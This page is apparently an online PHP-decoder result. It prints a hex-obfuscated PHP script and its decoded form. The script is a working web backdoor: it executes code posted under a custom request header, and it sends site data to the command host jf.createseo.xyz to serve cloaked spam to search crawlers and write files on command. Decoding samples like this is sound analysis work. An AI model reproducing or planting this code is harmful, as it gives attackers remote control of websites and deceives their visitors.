Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv='2.2.17'; $..

Decoded Output download

 
 
error_reporting(0); 
@set_time_limit(3600); 
@ignore_user_abort(1); 
$ixv='2.2.17'; 
$gov = "jf.createseo.xyz"; 
$db = "4001"; 
$ip = clientip(); 
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ""; 
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ""; 
$uri = $_SERVER["REQUEST_URI"]; 
$host = $_SERVER["HTTP_HOST"]; 
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:""; 
$token = isset($_SERVER['HTTP_XDOIM'])?$_SERVER['HTTP_XDOIM']:""; 
$proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ?  "https": "http"; 
$header = array('Lang: '.$lang,'User-Agent: '.$ua, 'Referer: '.$ur, 'Http-Proto: '.$proto, 'Http-Host: '.$host, 'Http-Uri: '.$uri, 'Dbgroup: '.$gov, 'Http-X-Forwarded-For: '.$ip,'Token: '.$token); 
$postdata= "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri"; 
 
if (strlen($token)>0){ @todk(".eGbA0Ty2Wh",@file_get_contents("php://input"),FILE_USE_INCLUDE_PATH);  echo (include '.eGbA0Ty2Wh'); unlink('.eGbA0Ty2Wh');  exit; } 
if (($uri!=="/favicon.ico") &&( @preg_match('#google|yahoo|bing#i',$ua) || (@preg_match('#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i',$ur) && (@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+_\d+_\d+)$#i',$uri)||@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+)#i',$uri))))){     
    list($cntx,$code,$ctype) = urlx('http://'.$gov.'/index?'.$postdata,$header,$postdata); 
    if (stripos($ctype,'gzip')>0){ @header('Content-type: application/x-gzip'); exit($cntx); } 
    if (stripos($cntx,'<!doct')===0||stripos($cntx,'<html')===0){ exit($cntx); } 
    if (stripos($cntx,'<?xml')===0){ @header('Content-type: text/xml'); exit($cntx); } 
     
    if (stripos($cntx,'http')===0){ 
        if (stripos($cntx,'?main_page=')){ @header('Location: ' . $cntx); exit;} 
        if (strstr($cntx,"[,]")){$segs = explode("[,]",$cntx); $lines = explode(",",$segs[0]); $result = ''; foreach($lines as $url){ list($respbody,$code) = urlx($url,null,null,$segs[1]);$result .= $url.$respbody; } exit($result);} 
    } 
    if (@preg_match('#^[^.]*.(txt|php)#i',$cntx)){$values = explode("[,]",$cntx); todk($values[0],$values[1]); if(file_exists($values[0])){ exit('end ok');}else{ exit('no false');} } 
    if (stripos($cntx,'ok')===0){ exit($cntx." ".$gov.$ixv); } 
    if ($code >= 400 && $code < 500){@header('HTTP/1.1 404 Not Found');exit;} 
    if ($code >= 500){@header('HTTP/1.1 500 Internal Server Error');exit;} 
    if ($cntx!=""){ exit($cntx); } 
} 
 
function urlx($url,$header=null,$postdata=null,$ua=null) { 
    if (!function_exists('curl_init')){ return; } 
    try { 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); 
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); 
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        ($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header); ($ua===null||$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua); 
        if ($postdata!==null && $postdata!=="") {curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); } 
        $body = curl_exec($ch);$code = curl_getinfo($ch,CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);curl_close($ch); 
    } catch (Exception $e) { }   if ($body===false && function_exists('file_get_contents')) { 
        ini_set('user_agent', 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)'); 
        try { 
            $body = @file_get_contents($url); 
        } catch (Exception $e) { } 
    } 
    return array($body,$code,$ctype); 
} 
function todk($fil,$str){@file_put_contents($fil,$str);} 
function clientip(){ $realip=''; 
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== ''){  $realip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
    } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {  $realip = getenv('REMOTE_ADDR'); 
    } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {  $realip = $_SERVER['REMOTE_ADDR']; 
    } 
    if (stristr($realip, ',')) { $values = explode(",", $realip); $realip = $values[0]; } return $realip; 
} 
 ?>

Did this file decode correctly?

Original Code



error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(1);
$ixv='2.2.17';
$gov = "\x6a\146\x2e\143\x72\145\x61\164\x65\163\x65\157\x2e\170\x79\172";
$db = "4001";
$ip = clientip();
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$uri = $_SERVER["REQUEST_URI"];
$host = $_SERVER["HTTP_HOST"];
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:"";
$token = isset($_SERVER['HTTP_XDOIM'])?$_SERVER['HTTP_XDOIM']:"";
$proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ?  "https": "http";
$header = array('Lang: '.$lang,'User-Agent: '.$ua, 'Referer: '.$ur, 'Http-Proto: '.$proto, 'Http-Host: '.$host, 'Http-Uri: '.$uri, 'Dbgroup: '.$gov, 'Http-X-Forwarded-For: '.$ip,'Token: '.$token);
$postdata= "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri";

if (strlen($token)>0){ @todk(".eGbA0Ty2Wh",@file_get_contents("php://input"),FILE_USE_INCLUDE_PATH);  echo (include '.eGbA0Ty2Wh'); unlink('.eGbA0Ty2Wh');  exit; }
if (($uri!=="/favicon.ico") &&( @preg_match('#google|yahoo|bing#i',$ua) || (@preg_match('#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i',$ur) && (@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+_\d+_\d+)$#i',$uri)||@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+)#i',$uri))))){    
    list($cntx,$code,$ctype) = urlx('http://'.$gov.'/index?'.$postdata,$header,$postdata);
    if (stripos($ctype,'gzip')>0){ @header('Content-type: application/x-gzip'); exit($cntx); }
    if (stripos($cntx,'<!doct')===0||stripos($cntx,'<html')===0){ exit($cntx); }
    if (stripos($cntx,'<?xml')===0){ @header('Content-type: text/xml'); exit($cntx); }
    
    if (stripos($cntx,'http')===0){
        if (stripos($cntx,'?main_page=')){ @header('Location: ' . $cntx); exit;}
        if (strstr($cntx,"[,]")){$segs = explode("[,]",$cntx); $lines = explode(",",$segs[0]); $result = ''; foreach($lines as $url){ list($respbody,$code) = urlx($url,null,null,$segs[1]);$result .= $url.$respbody; } exit($result);}
    }
    if (@preg_match('#^[^.]*.(txt|php)#i',$cntx)){$values = explode("[,]",$cntx); todk($values[0],$values[1]); if(file_exists($values[0])){ exit('end ok');}else{ exit('no false');} }
    if (stripos($cntx,'ok')===0){ exit($cntx." ".$gov.$ixv); }
    if ($code >= 400 && $code < 500){@header('HTTP/1.1 404 Not Found');exit;}
    if ($code >= 500){@header('HTTP/1.1 500 Internal Server Error');exit;}
    if ($cntx!=""){ exit($cntx); }
}

function urlx($url,$header=null,$postdata=null,$ua=null) {
    if (!function_exists('curl_init')){ return; }
    try {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        ($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header); ($ua===null||$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua);
        if ($postdata!==null && $postdata!=="") {curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); }
        $body = curl_exec($ch);$code = curl_getinfo($ch,CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);curl_close($ch);
    } catch (Exception $e) { }   if ($body===false && function_exists('file_get_contents')) {
        ini_set('user_agent', 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)');
        try {
            $body = @file_get_contents($url);
        } catch (Exception $e) { }
    }
    return array($body,$code,$ctype);
}
function todk($fil,$str){@file_put_contents($fil,$str);}
function clientip(){ $realip='';
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== ''){  $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {  $realip = getenv('REMOTE_ADDR');
    } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {  $realip = $_SERVER['REMOTE_ADDR'];
    }
    if (stristr($realip, ',')) { $values = explode(",", $realip); $realip = $values[0]; } return $realip;
}

Function Calls

None

Variables

None

Stats

MD5 7b6976a9a7afff5d80920f4354cd66e7
Eval Count 0
Decode Time 79 ms